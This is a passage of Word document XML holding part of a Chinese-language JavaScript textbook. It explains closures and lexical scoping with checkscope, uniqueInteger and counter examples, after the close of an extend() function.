      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=1;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>arguments.length;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var source=arguments[i];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var prop in source)o[prop]=source[prop];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return o;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果代码执行到这里，说明</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环不会枚举测试对象的</w:t>
      </w:r>
      <w:r>
        <w:t>toString</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>因此返回另一个版本的</w:t>
      </w:r>
      <w:r>
        <w:t>extend()</w:t>
      </w:r>
      <w:r>
        <w:t>函数，这个函数显式测试</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//Object.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>中的不可枚举属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>return function patched_extend(o){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=1;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>arguments.length;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var source=arguments[i];//</w:t>
      </w:r>
      <w:r>
        <w:t>复制所有的可枚举属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var prop in source)o[prop]=source[prop];//</w:t>
      </w:r>
      <w:r>
        <w:t>现在检查特殊属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var j=0;j</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>protoprops.length;j++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>prop=protoprops[j];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(source.hasOwnProperty(prop))o[prop]=source[prop];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return o;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>这个列表列出了需要检查的特殊属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var protoprops=["toString","valueOf","constructor","hasOwnProperty","isPrototypeOf","propertyIsEnumer</w:t>
      </w:r>
      <w:r>
        <w:t>able","toLocaleString"];</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207" w:name="8_6_Bi_Bao_"/>
      <w:r>
        <w:t>8.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　闭包</w:t>
      </w:r>
      <w:bookmarkEnd w:id="207"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>和其他大多数现代编程语言一样，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>也采用词法作用域（</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lexical </w:t>
      </w:r>
      <w:r>
        <w:t>scoping</w:t>
      </w:r>
      <w:r>
        <w:t>），也就是说，函数的执行依赖于变量作用域，这个作用域是在函数定义时决定的，而不是函数调用时决定的。为了实现这种词法作用域，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>函数对象的内部状态不仅包含函数的代码逻辑，还必须引用当前的作用域链（在继续阅读后续的章节之前，应当复习一下</w:t>
      </w:r>
      <w:r>
        <w:t>3.10</w:t>
      </w:r>
      <w:r>
        <w:t>节和</w:t>
      </w:r>
      <w:r>
        <w:t>3.10.3</w:t>
      </w:r>
      <w:r>
        <w:t>节中讲到的变量作用域和作用域链的概念）。函数对象可以通过作用域链相互关联起来，函数体内部的变量都可以保存在函数作用域内，这种特性在计算机科学文献中称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>闭包</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[10]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>从技术的角度讲，所有的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>函数都是闭包：</w:t>
      </w:r>
      <w:r>
        <w:t>它们都是对象，它们都关联到作用域链。定义大多数函数时的作用域链在调用函数时依然有效，但这并不影响闭包。当调用函数时闭包所指向的作用域链和定义函数时的作用域链不是同一个作用域链时，事情就变得非常微妙。当一个函数嵌套了另外一个函数，外部函数将嵌套的函数对象作为返回值返回的时候往往会发生这种事情。有很多强大的编程技术都利用到了这类嵌套的函数闭包，以至于这种编程模式在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中非常常见。当你第一次碰到闭包时可能会觉得非常让人费解，一旦你理解掌握了闭包之后，就能非常自如地使用它了，了解这一点至关重要。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>理</w:t>
      </w:r>
      <w:r>
        <w:t>解闭包首先要了解嵌套函数的词法作用域规则。看一下这段代码（这段代码和你刚在</w:t>
      </w:r>
      <w:r>
        <w:t>3.10</w:t>
      </w:r>
      <w:r>
        <w:t>节中看到的代码非常类似）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var scope="global scope";//</w:t>
      </w:r>
      <w:r>
        <w:t>全局变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function checkscope(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var scope="local scope";//</w:t>
      </w:r>
      <w:r>
        <w:t>局部变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function f(){return scope;}//</w:t>
      </w:r>
      <w:r>
        <w:t>在作用域中返回这个值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return f();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>checkscope()//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"local scope"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>checkscope()</w:t>
      </w:r>
      <w:r>
        <w:t>函数声明了一个局部变量，并定义了一</w:t>
      </w:r>
      <w:r>
        <w:t>个函数</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>，函数</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>返回了这个变量的值，最后将函数</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>的执行结果返回。</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>你应当非常清楚为什么调用</w:t>
      </w:r>
      <w:r>
        <w:t>checkscope()</w:t>
      </w:r>
      <w:r>
        <w:t>会返回</w:t>
      </w:r>
      <w:r>
        <w:t>"local scope"</w:t>
      </w:r>
      <w:r>
        <w:t>。现在我们对这段代码做一点改动。你知道这段代码返回什么吗？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var scope="global scope";//</w:t>
      </w:r>
      <w:r>
        <w:t>全局变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function checkscope(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var scope="local scope";//</w:t>
      </w:r>
      <w:r>
        <w:t>局部变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function f(){return scope;}//</w:t>
      </w:r>
      <w:r>
        <w:t>在作用域中返回这个值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return f;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>checkscop</w:t>
      </w:r>
      <w:r>
        <w:t>e()()//</w:t>
      </w:r>
      <w:r>
        <w:t>返回值是什么</w:t>
      </w:r>
      <w:r>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在这段代码中，我们将函数内的一对圆括号移动到了</w:t>
      </w:r>
      <w:r>
        <w:t>checkscope()</w:t>
      </w:r>
      <w:r>
        <w:t>之后。</w:t>
      </w:r>
      <w:r>
        <w:t>checkscope()</w:t>
      </w:r>
      <w:r>
        <w:t>现在仅仅返回函数内嵌套的一个函数对象，而不是直接返回结果。在定义函数的作用域外面，调用这个嵌套的函数（包含最后一行代码的最后一对圆括号）会发生什么事情呢？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>回想一下词法作用域的基本规则：</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>函数的执行用到了作用域链，这个作用域链是函数定义的时候创建的。嵌套的函数</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>定义在这个作用域链里，其中的变量</w:t>
      </w:r>
      <w:r>
        <w:t>scope</w:t>
      </w:r>
      <w:r>
        <w:t>一定是局部变量，不管在何时何地执行函数</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>，这种绑定</w:t>
      </w:r>
      <w:r>
        <w:t>在执行</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>时依然有效。因此最后一行代码返回</w:t>
      </w:r>
      <w:r>
        <w:t>"local scope"</w:t>
      </w:r>
      <w:r>
        <w:t>，而不是</w:t>
      </w:r>
      <w:r>
        <w:t>"global scope"</w:t>
      </w:r>
      <w:r>
        <w:t>。简言之，闭包的这个特性强大到让人吃惊：它们可以捕捉到局部变量（和参数），并一直保存下来，看起来像这些变量绑定到了在其中定义它们的外部函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>实现闭包</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果你理解了词法作用域的规则，你就能很容易地理解闭包：函数定义时的作用域链到函数执行时依然有效。然而很多程序员觉得闭包非常难理解，因为他们在深入学习闭包的实现细节时将自己搞得晕头转向。他们觉得在外部函数中定义的局部变量在函数返回后就不存在了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[11]</w:t>
      </w:r>
      <w:r>
        <w:t>，那么</w:t>
      </w:r>
      <w:r>
        <w:t>嵌套的函数如何能调用不存在的作用域链呢？如果你想搞清楚这个问题，你需要更深入地了解类似</w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>语言这种更底层的编程语言，并了解基于栈的</w:t>
      </w:r>
      <w:r>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:t>架构：如果一个函数的局部变量定义在</w:t>
      </w:r>
      <w:r>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:t>的栈中，那么当函数返回时它们的确就不存在了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>但回想一下在</w:t>
      </w:r>
      <w:r>
        <w:t>3.10.3</w:t>
      </w:r>
      <w:r>
        <w:t>节中是如何定义作用域链的。我们将作用域链描述为一个对象列表，不是绑定的栈。每次调用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>函数的时候，都会为之创建一个新的对象用来保存局部变量，把这个对象添加至作用域链中。当函数返回的时候，就从作用域链中将这个绑定变量的对象删除。如果不存在嵌套的函数，也没</w:t>
      </w:r>
      <w:r>
        <w:t>有其他引用指向这个绑定对象，它就会被当做垃圾回收掉。如果定义了嵌套的函数，每个嵌套的函数都各自对应一个作用域链，并且这个作用域链指向一个变量绑定对象。但如果这些嵌套的函数对象在外部函数中保存下来，那么它们也会和所指向的变量绑定对象一样当做垃圾回收。但是如果这个函数定义了嵌套的函数，并将它作为返回值返回</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>或者存储在某处的属性里，这时就会有一个外部引用指向这个嵌套的函数。它就不会被当做垃圾回收，并且它所指向的变量绑定对象也不会被当做垃圾回收</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[12]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>8.4.1</w:t>
      </w:r>
      <w:r>
        <w:t>节中定义了</w:t>
      </w:r>
      <w:r>
        <w:t>uniqueInteger()</w:t>
      </w:r>
      <w:r>
        <w:t>函数，这个</w:t>
      </w:r>
      <w:r>
        <w:t>函数使用自身的一个属性来保存每次返回的值，以便每次调用都能跟踪上次的返回值。但这种做法有一个问题，就是恶意代码可能将计数器重置或者把一个非整数赋值给它，导致</w:t>
      </w:r>
      <w:r>
        <w:t>uniquenterger()</w:t>
      </w:r>
      <w:r>
        <w:t>函数不一定能产生</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>唯一</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>整数</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。而闭包可以捕捉到单个函数调用的局部变量，并将这些局部变量用做私有状态。我们可以利用闭包这样来重写</w:t>
      </w:r>
      <w:r>
        <w:t>uniqueInteger()</w:t>
      </w:r>
      <w:r>
        <w:t>函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var uniqueInteger=(function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>定义函数并立即调用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var counter=0;//</w:t>
      </w:r>
      <w:r>
        <w:t>函数的私有状态</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:t>function(){return counter++;};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你需要仔细阅读这段代码才能理解其含义。粗略来看，第一行代码看起来像将函数赋值给一个变量</w:t>
      </w:r>
      <w:r>
        <w:t>uniqueInteger</w:t>
      </w:r>
      <w:r>
        <w:t>，实际上，这段代码定义了一个立即调用的函数（函数的开始带有左圆括号），因此是这个函数的返回值赋值给变量</w:t>
      </w:r>
      <w:r>
        <w:t>uniqueInteger</w:t>
      </w:r>
      <w:r>
        <w:t>。现在，我们来看函数体，这个函数返回另外一个函数，这是一个嵌套的函数，</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>我们将它赋值给变量</w:t>
      </w:r>
      <w:r>
        <w:t>uniqueInteger</w:t>
      </w:r>
      <w:r>
        <w:t>，嵌套的函数是可以访问作用域内的变量的，而且可以访问外部函数中定义的</w:t>
      </w:r>
      <w:r>
        <w:t>counter</w:t>
      </w:r>
      <w:r>
        <w:t>变量。当外部函数返回之后，其他任何代码都无法访问</w:t>
      </w:r>
      <w:r>
        <w:t>counter</w:t>
      </w:r>
      <w:r>
        <w:t>变量，只有内部的函数才能访问到它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>像</w:t>
      </w:r>
      <w:r>
        <w:t>counter</w:t>
      </w:r>
      <w:r>
        <w:t>一样的私有变量不是只能用在一个单独的闭包内，在同一个外部函数内定义的多个嵌套函数也可以访问它，这多个嵌套函数都共享一个作用域链，看一下这段代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function counter(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var n=0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>count:function(){return n++;},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>reset:function(){n=0;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var c=counter(),d=counter();/</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>创建两个计数器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.count()//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>d.count()//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>0:</w:t>
      </w:r>
      <w:r>
        <w:t>它们互不干扰</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.reset()//reset()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>count()</w:t>
      </w:r>
      <w:r>
        <w:t>方法共享状态</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.count()//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>0:</w:t>
      </w:r>
      <w:r>
        <w:t>因为我们重置了</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>d.count()//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>1:</w:t>
      </w:r>
      <w:r>
        <w:t>而没有重置</w:t>
      </w:r>
      <w:r>
        <w:t>d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>counter()</w:t>
      </w:r>
      <w:r>
        <w:t>函数返回了一个</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>计数器</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>对象，这个对象包含两个方法：</w:t>
      </w:r>
      <w:r>
